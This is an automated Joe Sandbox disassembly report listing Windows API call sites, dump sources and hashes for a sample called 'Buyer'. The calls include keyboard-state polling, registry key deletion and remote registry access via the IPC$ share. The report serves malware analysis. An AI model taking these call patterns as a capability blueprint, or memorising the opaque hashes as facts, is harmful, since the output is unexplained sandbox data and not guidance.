                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                    • Opcode ID: 9ae8106149417da5b267b91ef95cbe57d3ee99348e5ffc79244af5ab1fa823a6
                                                                                                    • Instruction ID: cbc63590b2c56cfeccb064451ad5bd14543ed3d39918b559413c411d335628e2
                                                                                                    • Opcode Fuzzy Hash: 9ae8106149417da5b267b91ef95cbe57d3ee99348e5ffc79244af5ab1fa823a6
                                                                                                    • Instruction Fuzzy Hash: 9C61E275D0021AAFCF04CFA8CD85EAEBBB6FF48310F20851AE956A7250D774A941DF60
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00FA507B
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00FA50BD
                                                                                                    • _wcslen.LIBCMT ref: 00FA50CE
                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00FA50DA
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FA510F
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FA5147
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00FA5180
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FA51DA
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00FA520C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA5284
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                    • String ID: ThumbnailClass
                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                    • Opcode ID: 83798ad84b9c5a1b3dc0be903a7e96c53307554676da4df8bf8ab7623b6a1856
                                                                                                    • Instruction ID: 77d831bf4d224b8d410d5d2f9a33f5bb075de65ea57cd5e500754bae58c19c14
                                                                                                    • Opcode Fuzzy Hash: 83798ad84b9c5a1b3dc0be903a7e96c53307554676da4df8bf8ab7623b6a1856
                                                                                                    • Instruction Fuzzy Hash: 3A9111B1504B06AFDB04DF24C894BBAB7E9FF52B24F00451DFA8682180EB35ED55EB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FD9446
                                                                                                    • GetFocus.USER32 ref: 00FD9456
                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00FD9461
                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FD9509
                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FD95BB
                                                                                                    • GetMenuItemCount.USER32(?), ref: 00FD95D8
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00FD95E8
                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FD961A
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FD965C
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FD968D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                    • Opcode ID: 3b95df8c46f387d1c3d91b5be3f1c717c881869dd51a330bc8f6802af20cf86e
                                                                                                    • Instruction ID: 2288553f452b46f55f17a986425c4baa880ffd7b9947313fb025e505437fb458
                                                                                                    • Opcode Fuzzy Hash: 3b95df8c46f387d1c3d91b5be3f1c717c881869dd51a330bc8f6802af20cf86e
                                                                                                    • Instruction Fuzzy Hash: 2B81E1719083019FD711CF64DC84A6B7BEAFF88324F18052AF98497391C7B1D901EBA1
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(010129B0,000000FF,00000000,00000030), ref: 00FAC6AD
                                                                                                    • SetMenuItemInfoW.USER32(010129B0,00000004,00000000,00000030), ref: 00FAC6E2
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00FAC6F4
                                                                                                    • GetMenuItemCount.USER32(?), ref: 00FAC73A
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00FAC757
                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00FAC783
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FAC7CA
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FAC810
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC825
                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC846
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                    • Opcode ID: 75a2083aaeb7964897affb264947cb9f261c623d9c2ab251dd856286f6268b9e
                                                                                                    • Instruction ID: d4a81255490e0818c00b3ccba6cefecf9a3021e4aa5ac084e1cf312de1e6abf9
                                                                                                    • Opcode Fuzzy Hash: 75a2083aaeb7964897affb264947cb9f261c623d9c2ab251dd856286f6268b9e
                                                                                                    • Instruction Fuzzy Hash: 496180B190024AAFDF11CF68DD88AEE7BB9FB06354F144159E841A3251C779AD05EBE0
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FAE1FE
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FAE224
                                                                                                    • _wcslen.LIBCMT ref: 00FAE22E
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FAE27E
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FAE29A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    APIs
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCD3E2
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FCD40B
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCD4C6
                                                                                                      • Part of subcall function 00FCD3B2: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FCD428
                                                                                                      • Part of subcall function 00FCD3B2: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FCD43B
                                                                                                      • Part of subcall function 00FCD3B2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FCD44D
                                                                                                      • Part of subcall function 00FCD3B2: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCD483
                                                                                                      • Part of subcall function 00FCD3B2: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCD4A6
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FCD471
                                                                                                    Similarity
                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 00FAECF5
                                                                                                      • Part of subcall function 00F5EF0E: timeGetTime.WINMM(?,?,00FAED15), ref: 00F5EF12
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00FAED22
                                                                                                    • EnumThreadWindows.USER32(?,Function_0006ECA6,00000000), ref: 00FAED46
                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FAED68
                                                                                                    • SetActiveWindow.USER32 ref: 00FAED87
                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FAED95
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FAEDB4
                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00FAEDBF
                                                                                                    • IsWindow.USER32 ref: 00FAEDCB
                                                                                                    • EndDialog.USER32(00000000), ref: 00FAEDDC
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                    • String ID: BUTTON
                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FAF09E
                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FAF0B4
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAF0C5
                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FAF0D7
                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FAF0E8
                                                                                                    Similarity
                                                                                                    • API ID: SendString$_wcslen
                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAA713
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAA77E
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00FAA79E
                                                                                                    • GetKeyState.USER32(000000A0), ref: 00FAA7B5
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00FAA7E4
                                                                                                    • GetKeyState.USER32(000000A1), ref: 00FAA7F5
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00FAA821
                                                                                                    • GetKeyState.USER32(00000011), ref: 00FAA82F
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00FAA858
                                                                                                    • GetKeyState.USER32(00000012), ref: 00FAA866
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00FAA88F
                                                                                                    • GetKeyState.USER32(0000005B), ref: 00FAA89D
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00FA63DB
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA63F4
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00FA6452
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00FA6462
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA6474
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00FA64C8
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA64D6
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA64E8
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00FA652A
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00FA653D
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FA6553
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00FA6560
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F58F0D,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F592EA
                                                                                                    • DestroyWindow.USER32(?), ref: 00F58FA6
                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F59040
                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F97019
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F97047
                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F9705E
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000), ref: 00F9707A
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00F9708C
                                                                                                    Similarity
                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 641708696-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59B74: GetWindowLongW.USER32(?,000000EB), ref: 00F59B82
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F59A92
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 259745315-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FA0E29
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FA0E45
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FA0E61
                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FA0E8B
                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00FA0EB3
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0EBE
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0EC3
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                    • API String ID: 323675364-22481851
                                                                                                    APIs
                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FD47FB
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00FD4802
                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FD4815
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FD481D
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FD4828
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00FD4832
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00FD483C
                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00FD4852
                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00FD485E
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FC43E3
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FC4411
                                                                                                    • CoUninitialize.OLE32 ref: 00FC441B
                                                                                                    • _wcslen.LIBCMT ref: 00FC44B4
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00FC4538
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FC465C
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FC4695
                                                                                                    • CoGetObject.OLE32(?,00000000,00FE0B80,?), ref: 00FC46B4
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00FC46C7
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FC474B
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FC475F
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FB8262
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FB82FE
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00FB8312
                                                                                                    • CoCreateInstance.OLE32(00FE0CF0,00000000,00000001,01007E7C,?), ref: 00FB835E
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FB83E3
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00FB843B
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00FB84C6
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FB84E9
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00FB84F0
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00FB8545
                                                                                                    • CoUninitialize.OLE32 ref: 00FB854B
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FD5CC4
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD5CD5
                                                                                                    • CharNextW.USER32(00000158), ref: 00FD5D04
                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FD5D45
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FD5D5B
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD5D6C
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CharNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1350042424-0
                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FA0136
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00FA018F
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FA01A1
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FA01C1
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00FA0214
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FA0228
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA023D
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00FA024A
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FA0253
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA0265
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FA0270
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAA397
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00FAA418
                                                                                                    • GetKeyState.USER32(000000A0), ref: 00FAA433
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00FAA44D
                                                                                                    • GetKeyState.USER32(000000A1), ref: 00FAA462
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00FAA47A
                                                                                                    • GetKeyState.USER32(00000011), ref: 00FAA48C
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00FAA4A4
                                                                                                    • GetKeyState.USER32(00000012), ref: 00FAA4B6
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00FAA4CE
                                                                                                    • GetKeyState.USER32(0000005B), ref: 00FAA4E0
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                    • API String ID: 707087890-567219261
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00FB89C6
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB89D6
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB89E2
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB8A7F
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8A93
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8AC5
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB8AFB
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8B04
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FB3B3E
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FB3B5F
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB5B0F
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FB5B85
                                                                                                    • GetLastError.KERNEL32 ref: 00FB5B8F
                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00FB5C16
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                    • API String ID: 4194297153-14809454
                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 00FD4437
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00FD4446
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD44CE
                                                                                                    • IsMenu.USER32(?), ref: 00FD44E2
                                                                                                    • CreatePopupMenu.USER32 ref: 00FD44EC
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD4519
                                                                                                    • DrawMenuBar.USER32 ref: 00FD4521
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$F
                                                                                                    • API String ID: 161812096-3044882817
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00FA2646
                                                                                                    • GetDlgCtrlID.USER32 ref: 00FA2651
                                                                                                    • GetParent.USER32 ref: 00FA266D
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA2670
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FA2679
                                                                                                    • GetParent.USER32(?), ref: 00FA268D
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA2690
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00FA2725
                                                                                                    • GetDlgCtrlID.USER32 ref: 00FA2730
                                                                                                    • GetParent.USER32 ref: 00FA274C
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA274F
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FA2758
                                                                                                    • GetParent.USER32(?), ref: 00FA276C
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA276F
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FD425B
                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FD425E
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD4285
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD42A8
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FD4320
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FD436A
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FD4385
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FD43A0
